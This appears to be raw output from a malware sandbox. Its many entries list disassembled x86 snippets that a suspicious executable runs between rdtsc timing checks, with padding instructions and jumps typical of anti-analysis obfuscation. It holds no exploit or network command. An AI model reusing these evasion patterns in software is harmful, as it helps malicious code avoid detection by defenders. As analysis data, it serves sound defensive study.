Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA00FA second address: 6DA00FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA00FF second address: 6DA016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE801498588h 0x00000013 xor cl, FFFFFF88h 0x00000016 jmp 00007FE80149857Bh 0x0000001b popfd 0x0000001c popad 0x0000001d movsx ebx, ax 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007FE801498588h 0x0000002d jmp 00007FE801498585h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA016F second address: 6DA0194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE80147ABFDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0194 second address: 6DA019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA019A second address: 6DA019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA019E second address: 6DA01A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA01A2 second address: 6DA020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007FE80147ABFFh 0x00000010 xchg eax, esi 0x00000011 jmp 00007FE80147AC06h 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FE80147AC01h 0x0000001e xor al, 00000026h 0x00000021 jmp 00007FE80147AC01h 0x00000026 popfd 0x00000027 mov edx, eax 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov eax, edx 0x00000030 mov ebx, 68706186h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA032A second address: 6DA034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ch, 31h 0x00000007 popad 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE801498588h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA034D second address: 6DA0368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E50B60h] 0x0000000f mov eax, 750BE5E0h 0x00000014 ret 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0368 second address: 6DA0383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0383 second address: 6DA039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA039B second address: 6DA039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA039F second address: 6DA03DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE80147ABFDh 0x00000011 adc esi, 3B7CA8A6h 0x00000017 jmp 00007FE80147AC01h 0x0000001c popfd 0x0000001d mov di, ax 0x00000020 popad 0x00000021 pop edi 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA03DA second address: 6DA03DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA03DE second address: 6DA0431 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0892D0EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE80147ABFEh 0x00000010 and eax, 6C704978h 0x00000016 jmp 00007FE80147ABFBh 0x0000001b popfd 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 mov di, si 0x00000026 pushad 0x00000027 mov ecx, 438D1B9Fh 0x0000002c mov ax, D2BBh 0x00000030 popad 0x00000031 popad 0x00000032 mov dword ptr [esp], edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE80147ABFDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0431 second address: 6DA0464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE801498588h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0464 second address: 6DA0468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0468 second address: 6DA046E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA04E8 second address: 6DA04EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA04EE second address: 6DA04FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80149857Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA04FD second address: 6DA056D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE80147ABFBh 0x00000011 or si, D62Eh 0x00000016 jmp 00007FE80147AC09h 0x0000001b popfd 0x0000001c call 00007FE80147AC00h 0x00000021 call 00007FE80147AC02h 0x00000026 pop ecx 0x00000027 pop ebx 0x00000028 popad 0x00000029 je 00007FE86F4D9D46h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE80147ABFDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA056D second address: 6DA0573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0573 second address: 6DA0577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0577 second address: 6DA057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA057B second address: 6DA060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d jmp 00007FE80147AC04h 0x00000012 mov dword ptr [esi], edi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE80147ABFEh 0x0000001b or si, BB98h 0x00000020 jmp 00007FE80147ABFBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FE80147AC08h 0x0000002c jmp 00007FE80147AC05h 0x00000031 popfd 0x00000032 popad 0x00000033 mov dword ptr [esi+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FE80147AC08h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA060E second address: 6DA0612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0612 second address: 6DA0618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0618 second address: 6DA0659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FE801498580h 0x00000011 mov dword ptr [esi+0Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE801498587h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0659 second address: 6DA0695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE80147AC08h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0695 second address: 6DA0699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0699 second address: 6DA069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA069F second address: 6DA06A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA06A5 second address: 6DA06A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA06A9 second address: 6DA06AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA06AD second address: 6DA06F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e pushfd 0x0000000f jmp 00007FE80147ABFEh 0x00000014 sub eax, 6B2A5438h 0x0000001a jmp 00007FE80147ABFBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [ebx+50h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007FE80147ABFBh 0x0000002c push esi 0x0000002d pop ebx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA06F1 second address: 6DA0705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE801498580h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0705 second address: 6DA0756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b pushad 0x0000000c mov ecx, edi 0x0000000e mov dh, 68h 0x00000010 popad 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 pushad 0x00000015 mov bx, cx 0x00000018 mov eax, 1A0FDA09h 0x0000001d popad 0x0000001e mov dword ptr [esi+18h], eax 0x00000021 jmp 00007FE80147AC04h 0x00000026 mov eax, dword ptr [ebx+58h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FE80147AC07h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0756 second address: 6DA075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA075C second address: 6DA0760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0760 second address: 6DA0788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE801498589h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0788 second address: 6DA078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA078C second address: 6DA0792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0792 second address: 6DA07A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC03h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07A9 second address: 6DA07E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+5Ch] 0x0000000e jmp 00007FE80149857Eh 0x00000013 mov dword ptr [esi+20h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07E2 second address: 6DA07E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07E6 second address: 6DA07EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07EC second address: 6DA07F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07F1 second address: 6DA0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, E9h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0803 second address: 6DA0809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0809 second address: 6DA083E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE801498585h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA083E second address: 6DA0852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0852 second address: 6DA0856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0856 second address: 6DA086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA086D second address: 6DA0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0893 second address: 6DA08A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA08A6 second address: 6DA0938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE80149857Fh 0x00000009 sub cl, 0000007Eh 0x0000000c jmp 00007FE801498589h 0x00000011 popfd 0x00000012 mov ecx, 43124CC7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+68h] 0x0000001d jmp 00007FE80149857Ah 0x00000022 mov dword ptr [esi+2Ch], eax 0x00000025 jmp 00007FE801498580h 0x0000002a mov ax, word ptr [ebx+6Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FE80149857Eh 0x00000035 or ch, FFFFFFD8h 0x00000038 jmp 00007FE80149857Bh 0x0000003d popfd 0x0000003e mov dh, ah 0x00000040 popad 0x00000041 mov word ptr [esi+30h], ax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FE80149857Eh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0938 second address: 6DA0950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5F5B01E4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+00000088h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0950 second address: 6DA0954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0954 second address: 6DA0958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0958 second address: 6DA095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA095E second address: 6DA0964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0964 second address: 6DA097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE80149857Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA097E second address: 6DA0A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE80147AC01h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FE80147AC01h 0x0000000f or ah, FFFFFFE6h 0x00000012 jmp 00007FE80147AC01h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [ebx+0000008Ch] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FE80147ABFCh 0x00000028 add al, FFFFFF88h 0x0000002b jmp 00007FE80147ABFBh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FE80147AC08h 0x00000037 jmp 00007FE80147AC05h 0x0000003c popfd 0x0000003d popad 0x0000003e mov dword ptr [esi+34h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FE80147AC06h 0x0000004a and esi, 1AB8A878h 0x00000050 jmp 00007FE80147ABFBh 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A40 second address: 6DA0A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A46 second address: 6DA0A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A4A second address: 6DA0A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE80149857Bh 0x00000017 jmp 00007FE801498583h 0x0000001c popfd 0x0000001d mov edi, esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A84 second address: 6DA0A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC00h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A98 second address: 6DA0AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+38h], eax 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f push eax 0x00000010 push edx 0x00000011 mov eax, edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0AAB second address: 6DA0ABB instructions: 0x00000000 rdtsc 0x00000002 mov bh, A3h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+1Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0ABB second address: 6DA0ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0ACA second address: 6DA0B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FE80147ABFBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+3Ch], eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE80147ABFBh 0x00000018 xor ecx, 4BAD0DBEh 0x0000001e jmp 00007FE80147AC09h 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+20h] 0x00000028 jmp 00007FE80147ABFEh 0x0000002d mov dword ptr [esi+40h], eax 0x00000030 jmp 00007FE80147AC00h 0x00000035 lea eax, dword ptr [ebx+00000080h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FE80147AC07h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B52 second address: 6DA0B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE801498584h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B6A second address: 6DA0B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B7A second address: 6DA0B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B7E second address: 6DA0B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B82 second address: 6DA0B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
